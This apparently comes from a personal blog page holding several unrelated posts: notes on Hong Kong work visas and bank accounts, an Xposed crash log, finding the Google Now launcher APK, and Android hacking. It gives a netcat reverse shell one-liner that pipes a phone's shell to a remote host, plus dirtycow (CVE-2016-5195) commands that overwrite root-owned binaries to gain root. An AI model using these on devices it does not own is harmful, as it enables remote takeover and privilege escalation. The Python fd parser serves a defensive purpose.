Get Android shell through wifi or internet, get Android shell without adb

Basically, this is a reverse shell.

Install a terminal emulator from Google Play on the device (the commands below assume Android Terminal Emulator, package jackpal.androidterm).


There is no need to be on the same Wi-Fi LAN; it is enough that the phone can reach the PC.

Do the following on the phone (replace PC_IP with the PC's address):

cd /data/data/jackpal.androidterm
mkfifo f
cat f | /system/bin/sh -i 2>&1 | nc PC_IP 4444 > f

Do the following on the PC (listening on the address the phone used as PC_IP):

nc -l 192.168.30.235 4444

Then you have a reverse shell and can control the phone from your PC even when you cannot enable adb.

You can even get root by using a CVE such as CVE-2016-5195 (see the dirtycow note below).

device hang after Xposed

One device started hanging randomly after Xposed was installed.

These error messages can be seen in logcat:

But I don't know yet what causes it.

The current workaround is to keep /data/dalvik-cache (not wipe it).

907 [ 117.924270] init: Service 'zygote' (pid 621) killed by signal 9
20161123_17:37:35.logcat
3834 01-01 12:46:19.877 1265 1816 E Watchdog: Triggering SysRq for system_server watchdog
3835 01-01 12:46:19.878 1265 1816 W Watchdog: *** WATCHDOG KILLING SYSTEM PROCESS: Blocked in handler on main thread (main)
3836 01-01 12:46:19.878 1265 1816 W Watchdog: main thread stack trace:
3837 01-01 12:46:19.878 1265 1816 W Watchdog: at dalvik.system.DexFile.openDexFileNative(Native Method)
3838 01-01 12:46:19.878 1265 1816 W Watchdog: at dalvik.system.DexFile.openDexFile(DexFile.java:295)
3839 01-01 12:46:19.878 1265 1816 W Watchdog: at dalvik.system.DexFile.<init>(DexFile.java:80)
3840 01-01 12:46:19.878 1265 1816 W Watchdog: at dalvik.system.DexFile.<init>(DexFile.java:59)
3841 01-01 12:46:19.878 1265 1816 W Watchdog: at dalvik.system.DexPathList.loadDexFile(DexPathList.java:279)
3842 01-01 12:46:19.878 1265 1816 W Watchdog: at dalvik.system.DexPathList.makePathElements(DexPathList.java:248)
3843 01-01 12:46:19.878 1265 1816 W Watchdog: at dalvik.system.DexPathList.<init>(DexPathList.java:120)
3844 01-01 12:46:19.878 1265 1816 W Watchdog: at dalvik.system.BaseDexClassLoader.<init>(BaseDexClassLoader.java:48)
3845 01-01 12:46:19.878 1265 1816 W Watchdog: at dalvik.system.PathClassLoader.<init>(PathClassLoader.java:65)
3846 01-01 12:46:19.879 1265 1816 W Watchdog: at android.app.ApplicationLoaders.getClassLoader(ApplicationLoaders.java:57)
3847 01-01 12:46:19.879 1265 1816 W Watchdog: at android.app.LoadedApk.getClassLoader(LoadedApk.java:383)
3848 01-01 12:46:19.879 1265 1816 W Watchdog: at de.robv.android.xposed.XposedInit$4.afterHookedMethod(XposedInit.java:169)
3849 01-01 12:46:19.879 1265 1816 W Watchdog: at de.robv.android.xposed.XposedBridge.handleHookedMethod(XposedBridge.java:348)
3850 01-01 12:46:19.879 1265 1816 W Watchdog: at android.app.LoadedApk.<init>(<Xposed>)
3851 01-01 12:46:19.879 1265 1816 W Watchdog: at android.app.ActivityThread.getPackageInfo(ActivityThread.java:1927)
3852 01-01 12:46:19.879 1265 1816 W Watchdog: at android.app.ActivityThread.getPackageInfoNoCheck(ActivityThread.java:1889)
3853 01-01 12:46:19.879 1265 1816 W Watchdog: at android.app.ActivityThread.handleReceiver(ActivityThread.java:2813)
3854 01-01 12:46:19.879 1265 1816 W Watchdog: at android.app.ActivityThread.access$2000(ActivityThread.java:173)
3855 01-01 12:46:19.879 1265 1816 W Watchdog: at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1513)
3856 01-01 12:46:19.879 1265 1816 W Watchdog: at android.os.Handler.dispatchMessage(Handler.java:102)
3857 01-01 12:46:19.879 1265 1816 W Watchdog: at android.os.Looper.loop(Looper.java:148)
3858 01-01 12:46:19.879 1265 1816 W Watchdog: at com.android.server.SystemServer.run(SystemServer.java:411)
3859 01-01 12:46:19.879 1265 1816 W Watchdog: at com.android.server.SystemServer.main(SystemServer.java:210)
3860 01-01 12:46:19.879 1265 1816 W Watchdog: at java.lang.reflect.Method.invoke(Native Method)
3861 01-01 12:46:19.879 1265 1816 W Watchdog: at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:727)
3862 01-01 12:46:19.879 1265 1816 W Watchdog: at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:617)
3863 01-01 12:46:19.879 1265 1816 W Watchdog: at de.robv.android.xposed.XposedBridge.main(XposedBridge.java:102)
3864 01-01 12:46:19.880 1265 1816 W Watchdog: *** GOODBYE!
3865 01-01 12:46:19.909 621 621 E Zygote : Exit zygote because system server (1265) has terminated


Taiwanese working in Hong Kong: work visa and bank account (2016)

Until last year, opening a Hong Kong bank account was still fairly easy and did not require much of a reason.

After arriving in Hong Kong I started trying to open an account at HSBC.

I first looked up the account-opening requirements online; there are many, and it is not clear which are mandatory and which are optional.

https://www.personal.hsbc.com.hk/1/content/hongkongpws/chinese/pdf/applyaccount_note.pdf

In short, I went to the bank four times and failed each time; I am extremely patient.

What was ultimately required:

Taiwan passport

Employment contract with the company, signed by the person in charge (mine was signed by the CTO). It must be the original; the bank does not keep it, it only needs to look at it.

Proof of address, usually a credit card or utility bill, but I was unlikely to have one; the bank said the company could print a proof of address for me.

Work visa

Proof of having entered on the work visa, i.e. the slip pasted into the passport, meaning you must have entered Hong Kong using the work visa.

Because I did not enter on the work visa this time, my passport does not have this; once I get it and successfully open the account, I will update this post.

Also

From the company submitting my application to the Immigration Department to receiving the work entry permit took about a month, including an extra week of waiting because the household registration transcript was missing.

Also 2

https://bankhk.wordpress.com/2014/06/25/%E9%A6%99%E6%B8%AF%E9%8A%80%E8%A1%8C%E6%88%B6%E5%8F%A3%E5%A5%BD%E8%99%95-2/

I also called about this account-opening service; they only help if you deposit more than three million TWD...

Also 3

I came to work in Hong Kong under this status:

http://www.immd.gov.hk/hkt/forms/forms/id990a.html

There is also a guide for people with this status; a must-read, mainly the sections on extension of stay and conditions of stay.

http://www.immd.gov.hk/pdforms/ID(C)991.pdf

Also 4

http://www.investhk.gov.hk/zh-hk/setting-up-your-business/hong-kong-immigration-and-visa-requirements.html

This page says:

====================================

The law requires Hong Kong residents aged 11 or above to carry their identity card with them at all times.

Persons permitted to stay in Hong Kong for more than 180 days, including those holding employment or investment visas, must apply to the Immigration Department for a Hong Kong identity card within 30 days of arrival. The procedure is simple and free of charge.

====================================

So you must apply for a smart identity card, which also makes it convenient to use the e-Channel at immigration later.

Besides the identity card, I also plan to apply for a multiple-entry permit.

Otherwise, after entering on a single-entry permit, returning to Taiwan and then coming back to Hong Kong would require a tourist visa.

Multiple-entry permit application: http://www.immd.gov.hk/hkt/forms/forms/id931.html

Identity card application for persons aged 18 or above: http://www.immd.gov.hk/hkt/services/hkid/reg_replace.html#above_18&secondTab

2017/1/2: Used the identity card to enter Hong Kong via the e-Channel; I did not even have to show the multiple-entry card. The whole entry experience felt as if you were a Hong Kong resident.

When applying for the identity card, fingerprints and a photo are taken; with the identity card you can use the e-Channel without applying for it separately.

remove google now launcher

I searched the system partition for the Google Now launcher for almost 6 hours and found nothing,

and it is impossible that the Google Now launcher exists but there is no such APK.

Finally, I thought of the data partition!

and then found /data/data/com.google.android.googlequicksearchbox/

but there is no APK in that folder,

so I looked into /proc/<pid of googlequicksearchbox>

and found the following:

1|root@device:/data/data # ls -l /proc/24823/fd/
lrwx------ u0_a59 u0_a59 2016-01-04 05:24 0 -> /dev/null
lrwx------ u0_a59 u0_a59 2016-01-04 05:24 1 -> /dev/null
lr-x------ u0_a59 u0_a59 2016-01-04 05:24 10 -> /dev/urandom
lrwx------ u0_a59 u0_a59 2016-01-04 05:24 11 -> /dev/binder
lr-x------ u0_a59 u0_a59 2016-01-04 05:24 12 -> /dev/ion
lrwx------ u0_a59 u0_a59 2016-01-04 05:24 13 -> anon_inode:[eventfd]
l-wx------ u0_a59 u0_a59 2016-01-04 05:24 14 -> /dev/cpuctl/tasks
l-wx------ u0_a59 u0_a59 2016-01-04 05:24 15 -> /dev/cpuctl/bg_non_interactive/tasks
lrwx------ u0_a59 u0_a59 2016-01-04 05:24 16 -> socket:[258179]
lr-x------ u0_a59 u0_a59 2016-01-04 05:24 17 -> pipe:[258180]
l-wx------ u0_a59 u0_a59 2016-01-04 05:24 18 -> pipe:[258180]
lrwx------ u0_a59 u0_a59 2016-01-04 05:24 19 -> anon_inode:[eventpoll]
lrwx------ u0_a59 u0_a59 2016-01-04 05:24 2 -> /dev/null
lr-x------ u0_a59 u0_a59 2016-01-04 05:24 20 -> /system/priv-app/Velvet/Velvet.apk
lrwx------ u0_a59 u0_a59 2016-01-04 05:24 21 -> /data/data/com.google.android.googlequicksearchbox/databases/launcher.db

Velvet.apk is the Google Now Launcher APK; just remove it! (It lives under /system/priv-app, so removing it needs root and a writable /system.)
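As an added example (not code from the original post), here is a small Python parser for the `ls -l /proc/<pid>/fd/` listing shown above. It serves both this section (finding the on-disk APK a running process was loaded from) and the reverse-shell note at the top of the page (spotting a process whose stdin is a pipe and which also holds a socket, the fd shape of the nc stage). The nc listing is constructed, not captured from a device.

```python
import re

# One line of `ls -l /proc/<pid>/fd/` output as shown on this page, e.g.
#   lr-x------ u0_a59 u0_a59 2016-01-04 05:24 20 -> /system/priv-app/Velvet/Velvet.apk
FD_LINE = re.compile(
    r"^(?P<mode>\S{10})\s+(?P<uid>\S+)\s+(?P<gid>\S+)\s+\S+\s+\S+\s+"
    r"(?P<fd>\d+)\s+->\s+(?P<target>.+)$"
)

def parse_fd_listing(text):
    """Return {fd_number: link_target}; the shell prompt line does not match and is skipped."""
    fds = {}
    for line in text.splitlines():
        m = FD_LINE.match(line.strip())
        if m:
            fds[int(m.group("fd"))] = m.group("target")
    return fds

def open_apks(fds):
    """On-disk APKs the process has open: this is how Velvet.apk was located above."""
    return sorted(t for t in fds.values() if t.endswith(".apk"))

def bridges_pipe_to_socket(fds):
    """True when stdin or stdout is an anonymous pipe and some fd is a socket: the
    fd shape of the `... | nc HOST PORT` stage, which an ordinary app process lacks."""
    std_is_pipe = any(fds.get(n, "").startswith("pipe:") for n in (0, 1))
    has_socket = any(t.startswith("socket:") for t in fds.values())
    return std_is_pipe and has_socket

# Excerpt of the launcher listing from this page.
LAUNCHER_FDS = """\
1|root@device:/data/data # ls -l /proc/24823/fd/
lrwx------ u0_a59 u0_a59 2016-01-04 05:24 0 -> /dev/null
lrwx------ u0_a59 u0_a59 2016-01-04 05:24 16 -> socket:[258179]
lr-x------ u0_a59 u0_a59 2016-01-04 05:24 17 -> pipe:[258180]
lr-x------ u0_a59 u0_a59 2016-01-04 05:24 20 -> /system/priv-app/Velvet/Velvet.apk
"""

# Constructed sample: what the nc stage of the reverse shell above would look like.
NC_FDS = """\
lr-x------ u0_a59 u0_a59 2016-01-04 05:24 0 -> pipe:[300001]
l-wx------ u0_a59 u0_a59 2016-01-04 05:24 1 -> /data/data/jackpal.androidterm/f
lrwx------ u0_a59 u0_a59 2016-01-04 05:24 2 -> /dev/pts/0
lrwx------ u0_a59 u0_a59 2016-01-04 05:24 3 -> socket:[300007]
"""
```

The launcher process holds a socket too, but its stdin is /dev/null, so only the nc listing is flagged; run the parser over a real `ls -l /proc/<pid>/fd/` capture to check other processes.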

get root permission by CVE-2016-5195 (dirtycow) on Android

Using this CVE to get root permission on Android:

https://github.com/timwr/CVE-2016-5195

https://github.com/timwr/CVE-2016-5195/blob/master/Makefile

$ adb shell 'chmod 777 /data/local/tmp/run-as'
$ adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
$ adb shell /system/bin/run-as

In brief, dirtycow can write data to a file that a normal user originally cannot write to,

so you can change the content of a file (a binary file, e.g. /system/fsck_exfat).

Every time fsck_exfat is triggered, your code is executed with root permission, because fsck_exfat originally runs as root and sepolicy allows this file to read/write block devices, so you can read/write any block device on the system!

REF:
http://forum.xda-developers.com/showpost.php?p=69381350&postcount=192

https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs